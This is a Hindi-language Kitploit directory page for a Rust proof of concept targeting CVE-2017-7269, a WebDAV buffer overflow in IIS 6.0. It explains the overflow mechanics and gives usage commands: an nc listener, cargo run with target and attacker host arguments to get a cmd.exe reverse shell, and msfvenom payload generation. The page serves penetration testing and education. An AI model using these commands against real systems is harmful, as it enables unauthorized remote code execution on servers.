Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2017-7269 — CVE-2017-7269 के लिए POC का एक Rust कार्यान्वयन, जो Microsoft Internet Information Services (IIS) 6.0 में WebDAV सेवा को लक्षित करता है। | Kitploit
उपकरण/GitHubGitHub/nika0x38/cve-2017-7269
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubnika0x38/cve-2017-7269

CVE-2017-7269

CVE-2017-7269 के लिए POC का एक Rust कार्यान्वयन, जो Microsoft Internet Information Services (IIS) 6.0 में WebDAV सेवा को लक्षित करता है।

रिपॉजिटरी देखें
1211 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2017-7269 - IIS 6.0 WebDAV बफर ओवरफ़्लो

RustSecurity

CVE-2017-7269 के POC का एक Rust कार्यान्वयन, जो Microsoft Internet Information Services (IIS) 6.0 में WebDAV सेवा को लक्षित करता है।

कमजोरी का अवलोकन

CVE-2017-7269 Microsoft IIS 6.0 के WebDAV सेवा में पाया जाने वाला एक गंभीर स्टैक-आधारित बफर ओवरफ़्लो है, जो Windows Server 2003 R2 के साथ शिप किया गया था। एक सफल शोषण अनधिकृत हमलावर को लक्ष्य सर्वर पर दूरस्थ कोड निष्पादन प्राप्त करने की अनुमति देता है।

तकनीकी विवरण

  • कमजोर घटक: httpext.dll (IIS WebDAV एक्सटेंशन)
  • कमजोर फंक्शन: ScStoragePathFromUrl
  • ट्रिगर: एक विशेष रूप से तैयार PROPFIND HTTP अनुरोध।
  • आक्रमण वेक्टर: एक अत्यधिक लंबा If: हेडर जिसमें कई URLs हैं।
  • विवरण

    यह कमजोरी एक क्लासिक स्टैक बफर ओवरफ़्लो है। यह तब ट्रिगर होता है जब ScStoragePathFromUrl फंक्शन एक दुर्भावनापूर्ण If: हेडर वाले PROPFIND अनुरोध को प्रोसेस करता है।

    यह शोषण बाइट्स की एक लंबी स्ट्रिंग के साथ ऐसे हेडर को तैयार करता है, जो स्टैक पर आवंटित बफर को ओवरफ़्लो कर देता है। यह ओवरफ़्लो महत्वपूर्ण स्टैक डेटा को ओवरराइट करता है, जिसमें सहेजा गया रिटर्न पता (EIP) भी शामिल है। शोषण इस रिटर्न पते को दुर्भावनापूर्ण हेडर के भीतर स्थित एक छोटे प्रारंभिक शेलकोड पेलोड की ओर इंगित करके प्रोग्राम के निष्पादन प्रवाह को हाईजैक कर लेता है। इस पहले-चरण के शेलकोड का काम मुख्य पेलोड, एक रिवर्स शेल को ढूंढना और निष्पादित करना है, जो उसी HTTP अनुरोध के बॉडी में भेजा जाता है। यह POC एक cmd.exe शेल को हमलावर-नियंत्रित लिसनर से जोड़कर दूरस्थ कोड निष्पादन का सफलतापूर्वक प्रदर्शन करता है।

    उपयोग

    उदाहरण 1: अंतर्निहित रिवर्स शेल

    1. एक लिसनर तैयार करें (पोर्ट को --lport से मिलाने के लिए समायोजित करें):

      root@kitploit:~
      nc -lvnp <attacker-port>
      
    2. एम्बेडेड शेलकोड के साथ शोषण चलाएं:

      root@kitploit:~
      cargo run --release -- --rhost <target-ip> --rport <target-port> --lhost <attacker-ip> --lport <attacker-port>
      

      यह उपकरण LHOST/LPORT का उपयोग करके WSA शेलकोड को फ्लाई पर पैच करता है और इसे HTTP बॉडी में वितरित करता है। जब लक्ष्य कमजोर होता है, तो आपका लिसनर cmd.exe से एक रिवर्स शेल प्राप्त करेगा।

    उदाहरण 2: बाहरी पेलोड लेकिन अनुशंसित नहीं (--payload)

    1. एक रॉ पेलोड तैयार करें

      root@kitploit:~
      msfvenom -p windows/exec CMD=whoami -f raw -o payload.bin
      
    2. पेलोड वितरित करें (--lhost/--lport की आवश्यकता नहीं है क्योंकि शेलकोड में वह जानकारी पहले से एनकोड होती है):

      root@kitploit:~
      cargo run --release -- --rhost <target-ip> --rport <target-port> --payload payload.bin
      
    3. कॉलबैक को पहले जैसे लिसनर में हैंडल करें। चूंकि बाइनरी दिए गए बाइट्स को सीधे स्ट्रीम करती है, सटीक व्यवहार आपके द्वारा उत्पन्न पेलोड पर निर्भर करता है।

    अस्वीकरण

    यह उपकरण केवल शैक्षिक और अधिकृत पैठ परीक्षण उद्देश्यों के लिए है। जिम्मेदारी से उपयोग करें और केवल उन सिस्टमों पर जिनके आप मालिक हैं या जिनके लिए आपके पास स्पष्ट अनुमति है।

    टूल डाउनलोड करें